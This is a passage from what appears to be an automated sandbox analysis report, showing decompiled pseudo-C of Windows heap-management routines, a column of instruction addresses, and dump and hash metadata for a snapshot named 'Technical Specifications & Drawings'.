							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E017AB150();
								} else {
									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E017AB150();
								__eflags =  *0x1897bc8;
								if( *0x1897bc8 == 0) {
									__eflags = 1;
									E01862073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1898748 - 1;
							if( *0x1898748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E017D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E017C7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E018614FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E017A9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E017A9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1898748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E017AB150();
											} else {
												E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E017AB150();
											_pop(_t491);
											__eflags =  *0x1897bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01862073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0186A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E017CA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E017C7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E017C7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01861411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E017C7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E017C7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x1898748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E017AB150();
							} else {
								E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E017AB150();
							__eflags =  *0x1897bc8;
							if( *0x1897bc8 == 0) {
								__eflags = 0;
								E01862073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x1898748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E017AB150();
												} else {
													E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E017AB150();
												__eflags =  *0x1897bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01862073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0186A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E017CA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E017CB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E017CA830(_t553, _v64, _v24);
								_t286 = E017C7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E017C7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01861411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E017C7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E017C7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01861411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E017D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E017CB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E017C7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E018614FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E017C99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E017CA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E017DABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                  0x017ca309
                                                  0x017ca316
                                                  0x017ca319
                                                  0x017ca31d
                                                  0x017ca32d
                                                  0x017ca331
                                                  0x01811e0d
                                                  0x01811e10
                                                  0x017ca3cb
                                                  0x017ca3cb
                                                  0x017ca3bd
                                                  0x017ca3c3
                                                  0x017ca3c3
                                                  0x017ca33a
                                                  0x01811e17
                                                  0x01811e1b
                                                  0x01811e1d
                                                  0x01811e2f
                                                  0x01811e34
                                                  0x01811e36
                                                  0x01811e3c
                                                  0x01811e3c
                                                  0x01811e3c
                                                  0x01811e3c
                                                  0x01811e36
                                                  0x01811e42
                                                  0x01811e45
                                                  0x01811e47
                                                  0x017ca3f8
                                                  0x017ca3f8
                                                  0x017ca3fb
                                                  0x017ca3fd
                                                  0x01811e50
                                                  0x017ca403
                                                  0x017ca411
                                                  0x017ca411
                                                  0x017ca411
                                                  0x017ca41e
                                                  0x017ca420
                                                  0x017ca424
                                                  0x017ca427
                                                  0x017ca7c9
                                                  0x017ca7cd
                                                  0x017ca7d2
                                                  0x017ca7d9
                                                  0x017ca7e0
                                                  0x017ca7e3
                                                  0x017ca7ed
                                                  0x017ca7f3
                                                  0x017ca7f9
                                                  0x017ca7ff
                                                  0x017ca802
                                                  0x017ca807
                                                  0x017ca809
                                                  0x017ca809
                                                  0x017ca809
                                                  0x017ca80f
                                                  0x017ca80f
                                                  0x017ca812
                                                  0x017ca81c
                                                  0x017ca821
                                                  0x017ca824
                                                  0x017ca42d
                                                  0x017ca42d
                                                  0x017ca42d
                                                  0x017ca42d
                                                  0x017ca42d
                                                  0x017ca436
                                                  0x017ca43a
                                                  0x017ca609
                                                  0x017ca60d
                                                  0x017ca612
                                                  0x017ca616
                                                  0x017ca61a
                                                  0x01811e57
                                                  0x01811e59
                                                  0x00000000
                                                  0x00000000
                                                  0x01811e5f
                                                  0x017ca620
                                                  0x017ca627
                                                  0x01811e64
                                                  0x01811e66
                                                  0x01811e6c
                                                  0x01811e72
                                                  0x01811e76
                                                  0x01811e95
                                                  0x01811e9a
                                                  0x01811e78
                                                  0x01811e8d
                                                  0x01811e92
                                                  0x01811ea0
                                                  0x01811ea5
                                                  0x01811eaa
                                                  0x01811eb2
                                                  0x01811eb6
                                                  0x01811eb9
                                                  0x01811eb9
                                                  0x01811ebe
                                                  0x01811ec2
                                                  0x01811ec2
                                                  0x01811e66
                                                  0x017ca62d
                                                  0x017ca633
                                                  0x017ca636
                                                  0x017ca63a
                                                  0x017ca63c
                                                  0x017ca640
                                                  0x017ca642
                                                  0x017ca644
                                                  0x017ca644
                                                  0x017ca644
                                                  0x017ca64d
                                                  0x017ca64d
                                                  0x017ca651
                                                  0x017ca655
                                                  0x01811eca
                                                  0x01811ed1
                                                  0x00000000
                                                  0x00000000
                                                  0x01811ed7
                                                  0x00000000
                                                  0x017ca65b
                                                  0x017ca669
                                                  0x017ca66e
                                                  0x017ca670
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca676
                                                  0x017ca67b
                                                  0x017ca680
                                                  0x017ca682
                                                  0x01811f1a
                                                  0x017ca688
                                                  0x017ca688
                                                  0x017ca688
                                                  0x017ca68a
                                                  0x017ca68d
                                                  0x01811f24
                                                  0x01811f2a
                                                  0x01811f31
                                                  0x01811f43
                                                  0x01811f43
                                                  0x01811f31
                                                  0x017ca693
                                                  0x017ca697
                                                  0x017ca69d
                                                  0x017ca6a0
                                                  0x017ca6a6
                                                  0x017ca6a8
                                                  0x017ca6a8
                                                  0x017ca6a8
                                                  0x017ca6a8
                                                  0x017ca6b2
                                                  0x017ca6b7
                                                  0x017ca6c1
                                                  0x017ca6c6
                                                  0x017ca6d2
                                                  0x017ca6d9
                                                  0x017ca6e3
                                                  0x017ca6e6
                                                  0x017ca6eb
                                                  0x017ca6ed
                                                  0x017ca6ed
                                                  0x017ca6ed
                                                  0x017ca6ed
                                                  0x017ca6f3
                                                  0x017ca6f8
                                                  0x017ca702
                                                  0x017ca70a
                                                  0x017ca70e
                                                  0x017ca71a
                                                  0x017ca71e
                                                  0x01811fcb
                                                  0x01811fcf
                                                  0x01811fdd
                                                  0x01811fe3
                                                  0x01811fe3
                                                  0x017ca724
                                                  0x017ca728
                                                  0x017ca72a
                                                  0x017ca72d
                                                  0x017ca737
                                                  0x017ca73a
                                                  0x017ca73c
                                                  0x017ca742
                                                  0x017ca748
                                                  0x01811f4d
                                                  0x01811f50
                                                  0x01811f56
                                                  0x01811f5c
                                                  0x01811f5f
                                                  0x01811f7e
                                                  0x01811f83
                                                  0x01811f61
                                                  0x01811f76
                                                  0x01811f7b
                                                  0x01811f89
                                                  0x01811f8e
                                                  0x01811f93
                                                  0x01811f94
                                                  0x01811f9a
                                                  0x01811f9c
                                                  0x01811f9e
                                                  0x01811fa1
                                                  0x01811fa1
                                                  0x01811fa6
                                                  0x01811fa6
                                                  0x01811f50
                                                  0x017ca74e
                                                  0x017ca751
                                                  0x017ca754
                                                  0x017ca75d
                                                  0x017ca75e
                                                  0x017ca762
                                                  0x017ca767
                                                  0x01811faf
                                                  0x01811fb0
                                                  0x01811fb9
                                                  0x01811fbe
                                                  0x01811fc2
                                                  0x01811fc2
                                                  0x017ca76d
                                                  0x017ca76d
                                                  0x017ca775
                                                  0x017ca778
                                                  0x017ca77d
                                                  0x017ca77d
                                                  0x017ca71e
                                                  0x017ca782
                                                  0x017ca787
                                                  0x017ca789
                                                  0x01811ff3
                                                  0x017ca78f
                                                  0x017ca78f
                                                  0x017ca78f
                                                  0x017ca791
                                                  0x017ca794
                                                  0x01811ffd
                                                  0x01812006
                                                  0x0181200c
                                                  0x01812017
                                                  0x01812019
                                                  0x01812024
                                                  0x01812024
                                                  0x01812024
                                                  0x01812047
                                                  0x01812047
                                                  0x0181200c
                                                  0x017ca79a
                                                  0x017ca79f
                                                  0x017ca7a4
                                                  0x017ca7a9
                                                  0x017ca7ab
                                                  0x0181205a
                                                  0x017ca7b1
                                                  0x017ca7b1
                                                  0x017ca7b1
                                                  0x017ca7b3
                                                  0x017ca7b6
                                                  0x00000000
                                                  0x017ca7bc
                                                  0x01812066
                                                  0x01812068
                                                  0x01812073
                                                  0x01812073
                                                  0x01812073
                                                  0x01812078
                                                  0x01812079
                                                  0x0181207d
                                                  0x00000000
                                                  0x0181207d
                                                  0x017ca7b6
                                                  0x017ca440
                                                  0x017ca440
                                                  0x017ca440
                                                  0x017ca446
                                                  0x017ca44c
                                                  0x017ca44f
                                                  0x017ca453
                                                  0x017ca455
                                                  0x018120b3
                                                  0x018120b9
                                                  0x018120b9
                                                  0x017ca45d
                                                  0x017ca460
                                                  0x017ca464
                                                  0x017ca466
                                                  0x017ca46b
                                                  0x017ca46f
                                                  0x017ca471
                                                  0x017ca471
                                                  0x017ca471
                                                  0x017ca474
                                                  0x017ca479
                                                  0x017ca47d
                                                  0x017ca47f
                                                  0x01812229
                                                  0x0181222f
                                                  0x017ca3c8
                                                  0x017ca3c8
                                                  0x017ca3ca
                                                  0x017ca3ca
                                                  0x00000000
                                                  0x017ca3ca
                                                  0x01812235
                                                  0x0181223a
                                                  0x0181223a
                                                  0x00000000
                                                  0x00000000
                                                  0x01812240
                                                  0x01812246
                                                  0x0181224a
                                                  0x01812269
                                                  0x0181226e
                                                  0x0181224c
                                                  0x01812261
                                                  0x01812266
                                                  0x01812274
                                                  0x01812279
                                                  0x0181227e
                                                  0x01812286
                                                  0x01812288
                                                  0x0181228d
                                                  0x0181228d
                                                  0x01812292
                                                  0x01812292
                                                  0x01812295
                                                  0x01812295
                                                  0x00000000
                                                  0x01812295
                                                  0x017ca485
                                                  0x017ca489
                                                  0x017ca48b
                                                  0x017ca48f
                                                  0x017ca493
                                                  0x017ca497
                                                  0x017ca49b
                                                  0x017ca4bb
                                                  0x017ca4bb
                                                  0x017ca4bd
                                                  0x017ca4ff
                                                  0x017ca4ff
                                                  0x017ca501
                                                  0x017ca505
                                                  0x017ca50f
                                                  0x017ca517
                                                  0x017ca51b
                                                  0x017ca527
                                                  0x017ca52b
                                                  0x01812182
                                                  0x01812185
                                                  0x01812193
                                                  0x01812199
                                                  0x01812199
                                                  0x017ca531
                                                  0x017ca535
                                                  0x017ca538
                                                  0x017ca548
                                                  0x017ca54b
                                                  0x017ca54d
                                                  0x017ca553
                                                  0x017ca559
                                                  0x01812100
                                                  0x01812103
                                                  0x01812109
                                                  0x0181210f
                                                  0x01812112
                                                  0x01812131
                                                  0x01812136
                                                  0x01812114
                                                  0x01812129
                                                  0x0181212e
                                                  0x0181213c
                                                  0x01812141
                                                  0x01812147
                                                  0x0181214d
                                                  0x01812151
                                                  0x01812154
                                                  0x01812154
                                                  0x01812159
                                                  0x01812159
                                                  0x01812103
                                                  0x017ca55f
                                                  0x017ca562
                                                  0x017ca565
                                                  0x017ca567
                                                  0x01812162
                                                  0x017ca56d
                                                  0x017ca574
                                                  0x017ca575
                                                  0x017ca579
                                                  0x017ca57e
                                                  0x01812169
                                                  0x0181216a
                                                  0x01812170
                                                  0x01812175
                                                  0x01812179
                                                  0x01812179
                                                  0x017ca57e
                                                  0x017ca584
                                                  0x017ca58f
                                                  0x017ca58f
                                                  0x017ca52b
                                                  0x017ca5ad
                                                  0x017ca5bc
                                                  0x017ca5c1
                                                  0x017ca5c6
                                                  0x017ca5cb
                                                  0x017ca5cd
                                                  0x018121a9
                                                  0x017ca5d3
                                                  0x017ca5d3
                                                  0x017ca5d3
                                                  0x017ca5d5
                                                  0x017ca5d8
                                                  0x018121b3
                                                  0x018121bc
                                                  0x018121c2
                                                  0x018121cd
                                                  0x018121cf
                                                  0x018121da
                                                  0x018121da
                                                  0x018121da
                                                  0x018121f7
                                                  0x018121f7
                                                  0x018121c2
                                                  0x017ca5de
                                                  0x017ca5e3
                                                  0x017ca5e8
                                                  0x017ca5ea
                                                  0x0181220a
                                                  0x017ca5f0
                                                  0x017ca5f0
                                                  0x017ca5f0
                                                  0x017ca5f2
                                                  0x017ca5f5
                                                  0x01812219
                                                  0x0181221b
                                                  0x0181208c
                                                  0x0181208c
                                                  0x0181208c
                                                  0x01812095
                                                  0x01812096
                                                  0x01812097
                                                  0x01812098
                                                  0x018120a4
                                                  0x018120a5
                                                  0x018120a9
                                                  0x018120a9
                                                  0x00000000
                                                  0x017ca5f5
                                                  0x017ca4bf
                                                  0x017ca4d3
                                                  0x017ca4d8
                                                  0x017ca4da
                                                  0x01811ede
                                                  0x01811ede
                                                  0x01811ee4
                                                  0x01811ee9
                                                  0x00000000
                                                  0x00000000
                                                  0x01811f07
                                                  0x00000000
                                                  0x01811f07
                                                  0x017ca4e0
                                                  0x017ca4e5
                                                  0x017ca4e7
                                                  0x018120cb
                                                  0x017ca4ed
                                                  0x017ca4ed
                                                  0x017ca4ed
                                                  0x017ca4f2
                                                  0x017ca4f5
                                                  0x018120d5
                                                  0x018120de
                                                  0x018120e4
                                                  0x018120f6
                                                  0x018120f6
                                                  0x018120e4
                                                  0x017ca4fb
                                                  0x00000000
                                                  0x017ca4fb
                                                  0x017ca4a1
                                                  0x017ca4a4
                                                  0x017ca4a8
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca4aa
                                                  0x017ca4ac
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca4b2
                                                  0x017ca4b5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017ca4b5
                                                  0x017ca43a
                                                  0x017ca340
                                                  0x017ca346
                                                  0x017ca600
                                                  0x00000000
                                                  0x017ca600
                                                  0x017ca34f
                                                  0x017ca351
                                                  0x017ca358
                                                  0x017ca3c6
                                                  0x00000000
                                                  0x017ca371
                                                  0x017ca37a
                                                  0x017ca37f
                                                  0x017ca382
                                                  0x017ca384
                                                  0x017ca394
                                                  0x00000000
                                                  0x017ca396
                                                  0x017ca399
                                                  0x017ca3a7
                                                  0x017ca3b0
                                                  0x017ca3b4
                                                  0x017ca3bb
                                                  0x017ca3d2
                                                  0x017ca3da
                                                  0x017ca3df
                                                  0x017ca3e1
                                                  0x017ca3e5
                                                  0x017ca3ea
                                                  0x017ca3f0
                                                  0x017ca3f0
                                                  0x017ca3e1
                                                  0x00000000
                                                  0x017ca3bb
                                                  0x017ca394

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-523794902
                                                  • Opcode ID: 81fa5ae3ca4b4a7ad752bde6c42691d5c35ca7e5a930923ea81b5c0c4d3f3a25
                                                  • Instruction ID: ee1d9e94303b15b2e6cfb706220f3a288effa619e921828164af16b0b1d496ce
                                                  • Opcode Fuzzy Hash: 81fa5ae3ca4b4a7ad752bde6c42691d5c35ca7e5a930923ea81b5c0c4d3f3a25
                                                  • Instruction Fuzzy Hash: 4B42FF316047469FC715CF38C488A2AFBE6BF94B04F18496DE586CB356E734DA81CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017B3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E017B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E017B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E017B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E017B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
